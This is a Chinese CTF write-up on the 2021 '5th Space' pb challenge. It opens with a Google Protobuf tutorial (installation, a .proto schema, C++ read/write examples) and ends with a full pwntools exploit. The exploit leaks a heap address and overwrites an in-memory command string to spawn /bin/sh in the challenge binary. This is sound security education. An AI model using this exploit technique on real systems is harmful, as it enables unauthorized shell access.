[原创] 2021第五空间 pb WP
发表于: 2021-10-27 22:52 9565
基于2021第五空间的题目pb学习google Protobuf。
google Protobuf
题目通过google Protobuf 实现了数据的编解码应用。Google Protobuf是一种平台无关,语言无关的结构化数据编解码协议,类似JSON或者XML。且Google Protobuf支持多种语言,C++,python等,这里使用的是C++。
Ubuntu 18.04安装 C++ Protocol
下载并安装 需要root权限
1 2 3 4 5 6 | tar - xzvf protobuf - cpp - 3.18 . 0.tar .gz cd protobuf - 3.18 . 0 . / autogen.sh . / configure - - prefix = / usr / local / protobuf make - j8 && make install ldconfig |
1 2 3 4 5 6 | 在 / etc / profile文件中添加下面两行 export PATH = $PATH: / usr / local / protobuf / bin / export PKG_CONFIG_PATH = / usr / local / protobuf / lib / pkgconfig / 然后执行 source / etc / profile |
1 2 3 4 5 | 在文件 / etc / ld.so.conf中添加下面一行 / usr / local / protobuf / lib(注意: 在新行处添加) 更改完成之后执行下面的命令 ldconfig |
- 定义消息格式文件,最好以proto作为后缀名
- 使用Google提供的protocol buffers编译器来生成代码文件,一般为.h和.cc文件,主要是对消息格式以特定的语言方式描述
- 使用protocol buffers库提供的API来编写应用程序
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 | syntax = "proto2" ; package tutorial:; message Person { optional string name = 1 ; optional int32 id = 2 ; optional string email = 3 ; enum PhoneType { MOBILE = 0 ; HOME = 1 ; WORK = 2 ; } message PhoneNumber { optional string number = 1 ; optional PhoneType type = 2 [default = HOME]; } repeated PhoneNumber phones = 4 ; } message AddressBook { repeated Person people = 1 ; } |
- 对于required的字段而言,初值是必须要提供的,否则字段的便是未初始化的。
- 对于optional的字段而言,如果未进行初始化,那么一个默认值将赋予该字段,当然也可以指定默认值,如上述proto定义中的PhoneType字段类型。
- 对于repeated的字段而言,该字段可以重复多个。
- 其中字段标签标示了字段在二进制流中存放的位置,这个是必须的,而且序列化与反序列化的时候相同的字段的Tag值必须对应,否则反序列化会出现意想不到的问题
protoc 编译 .proto 文件生成读写接口
1 2 3 4 5 6 | / / $SRC_DIR: .proto 所在的源目录 / / - - cpp_out: 生成 c + + 代码 / / $DST_DIR: 生成代码的目标目录 / / xxx.proto: 要针对哪个 proto 文件生成接口代码 protoc - I = $SRC_DIR - - cpp_out = $DST_DIR $SRC_DIR / xxx.proto |
这里用上面的.proto文件的example进行编译,生成address.pb.h 和address.pb.cc 文件
1 | protoc - I = . / - - cpp_out = . / addressbook.proto |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 | / / string 类型的成员变量 name inline bool has_name() const; inline void clear_name(); inline const ::std::string& name() const; inline void set_name(const ::std::string& value); inline void set_name(const char * value); inline ::std::string * mutable_name(); / / 让你获得指向字符串的直接指针的getter,以及一个额外的setter。对应.proto中的repeated字段 / / 整形的成员变量 id inline bool has_id() const; inline void clear_id(); inline int32_t id () const; inline void set_id(int32_t value); bool SerializeToString(string * output) const; / / 将消息序列化并且存储在output变量中 bool ParseFromString(const string& data); / / 从字符串中解析消息序列 bool SerializeToOstream(ostream * output) const; / / 将消息序列化成字符串并输入文件中 bool ParseFromIstream(istream * input ); / / 从文件中读取字符串并且解析为消息序列 |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 | #include <iostream> #include <fstream> #include <string> #include "addressbook.pb.h" using namespace std; / / This function fills in a Person message based on user input . void PromptForAddress(tutorial::Person * person) { cout << "Enter person ID number: " ; int id ; cin >> id ; person - >set_id( id ); cin.ignore( 256 , '\n' ); cout << "Enter name: " ; getline(cin, * person - >mutable_name()); cout << "Enter email address (blank for none): " ; string email; getline(cin, email); if (!email.empty()) { person - >set_email(email); } while (true) { cout << "Enter a phone number (or leave blank to finish): " ; string number; getline(cin, number); if (number.empty()) { break ; } tutorial::Person::PhoneNumber * phone_number = person - >add_phones(); phone_number - >set_number(number); cout << "Is this a mobile, home, or work phone? " ; string type ; getline(cin, type ); if ( type = = "mobile" ) { phone_number - >set_type(tutorial::Person::MOBILE); } else if ( type = = "home" ) { phone_number - >set_type(tutorial::Person::HOME); } else if ( type = = "work" ) { phone_number - >set_type(tutorial::Person::WORK); } else { cout << "Unknown phone type. Using default." << endl; } } } / / Main function: Reads the entire address book from a file , / / adds one person based on user input , then writes it back out to the same / / file . int main( int argc, char * argv[]) { / / Verify that the version of the library that we linked against is / / compatible with the version of the headers we compiled against. GOOGLE_PROTOBUF_VERIFY_VERSION; if (argc ! = 2 ) { cerr << "Usage: " << argv[ 0 ] << " ADDRESS_BOOK_FILE" << endl; return - 1 ; } tutorial::AddressBook address_book; { / / Read the existing address book. fstream input (argv[ 1 ], ios:: in | ios::binary); if (! input ) { cout << argv[ 1 ] << ": File not found. Creating a new file." << endl; } else if (!address_book.ParseFromIstream(& input )) { cerr << "Failed to parse address book." << endl; return - 1 ; } } / / Add an address. PromptForAddress(address_book.add_people()); { / / Write the new address book back to disk. fstream output(argv[ 1 ], ios::out | ios::trunc | ios::binary); if (!address_book.SerializeToOstream(&output)) { cerr << "Failed to write address book." << endl; return - 1 ; } } / / Optional: Delete all global objects allocated by libprotobuf. google::protobuf::ShutdownProtobufLibrary(); return 0 ; } |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 | #include <iostream> #include <fstream> #include <string> #include "addressbook.pb.h" using namespace std; / / Iterates though all people in the AddressBook and prints info about them. void ListPeople(const tutorial::AddressBook& address_book) { for ( int i = 0 ; i < address_book.people_size(); i + + ) { const tutorial::Person& person = address_book.people(i); cout << "Person ID: " << person. id () << endl; cout << " Name: " << person.name() << endl; if (person.has_email()) { cout << " E-mail address: " << person.email() << endl; } for ( int j = 0 ; j < person.phones_size(); j + + ) { const tutorial::Person::PhoneNumber& phone_number = person.phones(j); switch (phone_number. type ()) { case tutorial::Person::MOBILE: cout << " Mobile phone #: " ; break ; case tutorial::Person::HOME: cout << " Home phone #: " ; break ; case tutorial::Person::WORK: cout << " Work phone #: " ; break ; } cout << phone_number.number() << endl; } } } / / Main function: Reads the entire address book from a file and prints all / / the information inside. int main( int argc, char * argv[]) { / / Verify that the version of the library that we linked against is / / compatible with the version of the headers we compiled against. GOOGLE_PROTOBUF_VERIFY_VERSION; if (argc ! = 2 ) { cerr << "Usage: " << argv[ 0 ] << " ADDRESS_BOOK_FILE" << endl; return - 1 ; } tutorial::AddressBook address_book; { / / Read the existing address book. fstream input (argv[ 1 ], ios:: in | ios::binary); if (!address_book.ParseFromIstream(& input )) { cerr << "Failed to parse address book." << endl; return - 1 ; } } ListPeople(address_book); / / Optional: Delete all global objects allocated by libprotobuf. google::protobuf::ShutdownProtobufLibrary(); return 0 ; } |
分别对write_message.cpp 和 read_message.cpp进行编译
1 2 3 4 | g + + addressbook.pb.cc write_message.cpp - o write `pkg - config - - cflags - - libs protobuf` g + + addressbook.pb.cc read_message.cpp - o read `pkg - config - - cflags - - libs protobuf` 可以添加 - g选项保留调试信息 |
1 2 3 4 5 6 | [ * ] '/mnt/d/WSL/Ubuntu18/race/5space/pb' Arch: amd64 - 64 - little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: No PIE ( 0x400000 ) |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 | syntax = "proto2" ; package ctf; message Person { enum PhoneType { MOBILE = 0 ; HOME = 1 ; WORK = 2 ; } message PhoneNumber { optional string number = 1 ; optional PhoneType type = 2 ; } optional string bio = 1 ; optional int32 id = 2 ; optional string email = 3 ; repeated PhoneNumber phones = 4 ; optional string name = 5 ; optional bool rw = 6 ; repeated uint64 salary = 7 ; repeated int64 day = 8 ; required string show_off = 9 ; } message AddressBook { repeated Person people = 1 ; } |
1 2 | pip3 install protobuf . / extractors / from_binary.py [ - h] input_file [output_dir] |
.proto 同样支持python,利用proto编译器编译从题目提取出来的.proto文件
1 2 3 | pip install google pip install protobuf protoc - I = . / - - python_out = . / addressbook.proto / / 得到addressbook_pb2.py |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 | from pwn import * from addressbook_pb2 import * context(os = 'linux' , arch = 'amd64' ,log_level = 'debug' ) p = process( "./pb" ) se = lambda data :p.send(data) sa = lambda delim,data :p.sendafter(delim, data) sl = lambda data :p.sendline(data) sla = lambda delim,data :p.sendlineafter(delim, data) rc = lambda numb = 4096 :p.recv(numb) ru = lambda delims :p.recvuntil(delims) uu32 = lambda data :u32(data.ljust( 4 , '\x00' )) uu64 = lambda data :u64(data.ljust( 8 , '\x00' )) info_addr = lambda tag, addr :p.success(tag + ': {:#x}' . format (addr)) def debug(): gdb.attach(p) p.interactive() def debug_pause(): gdb.attach(p) pause() def new_person(offset,cr,rw,bio = "111" ,name = "clarkes" ): person = Person() addressbook = AddressBook() person.day.append(offset) person.salary.append(cr) person.name = name person.bio = bio person. id = 10 person.show_off = "" if rw: person.rw = True addressbook.people.append(person) return addressbook.SerializeToString() #debug_pause() #gdb.attach(p,"b *0x40bdfe") #0x41faa5 #0x40671E #0x409D1A #0x40BBB6 # leak heap_address heap_address = 0 ru( "Your input size:" ) sl( str ( len (new_person( 0x20 , 1 , 0 )))) se(new_person( 0x20 , 1 , 0 )) ru( "Show me the money: " ) value = int (p.recvuntil( "\n" ,drop = True )) heap_address = value ru( "Your input size:" ) sl( str ( len (new_person( 0x21 , 1 , 0 )))) se(new_person( 0x21 , 1 , 0 )) ru( "Show me the money: " ) value = int (p.recvuntil( "\n" ,drop = True )) heap_address = heap_address + value * 0x100 ru( "Your input size:" ) sl( str ( len (new_person( 0x22 , 1 , 0 )))) se(new_person( 0x22 , 1 , 0 )) ru( "Show me the money: " ) value = int (p.recvuntil( "\n" ,drop = True )) heap_address = heap_address + value * 0x10000 ru( "Your input size:" ) sl( str ( len (new_person( 0x23 , 1 , 0 )))) se(new_person( 0x23 , 1 , 0 )) ru( "Show me the money: " ) value = int (p.recvuntil( "\n" ,drop = True )) heap_address = heap_address + value * 0x1000000 info_addr( "heap_address" ,heap_address) # 0x8EC2C8 echo done # 0x8EC2C9 ;/bin/sh 最后添加";"符号,getshell target = 0x8EC2C9 - (heap_address - 0x90 ) ru( "Your input size:" ) sl( str ( len (new_person(target + 1 , ord ( "/" ), 1 )))) se(new_person(target + 1 , ord ( "/" ), 1 )) ru( "Your input size:" ) sl( str ( len (new_person(target + 2 , ord ( "b" ), 1 )))) se(new_person(target + 2 , ord ( "b" ), 1 )) ru( "Your input size:" ) sl( str ( len (new_person(target + 3 , ord ( "i" ), 1 )))) se(new_person(target + 3 , ord ( "i" ), 1 )) ru( "Your input size:" ) sl( str ( len (new_person(target + 4 , ord ( "n" ), 1 )))) se(new_person(target + 4 , ord ( "n" ), 1 )) ru( "Your input size:" ) sl( str ( len (new_person(target + 5 , ord ( "/" ), 1 )))) se(new_person(target + 5 , ord ( "/" ), 1 )) ru( "Your input size:" ) sl( str ( len (new_person(target + 6 , ord ( "s" ), 1 )))) se(new_person(target + 6 , ord ( "s" ), 1 )) ru( "Your input size:" ) sl( str ( len (new_person(target + 7 , ord ( "h" ), 1 )))) se(new_person(target + 7 , ord ( "h" ), 1 )) ru( "Your input size:" ) sl( str ( len (new_person(target, ord ( ";" ), 1 )))) se(new_person(target, ord ( ";" ), 1 )) #debug() p.interactive() |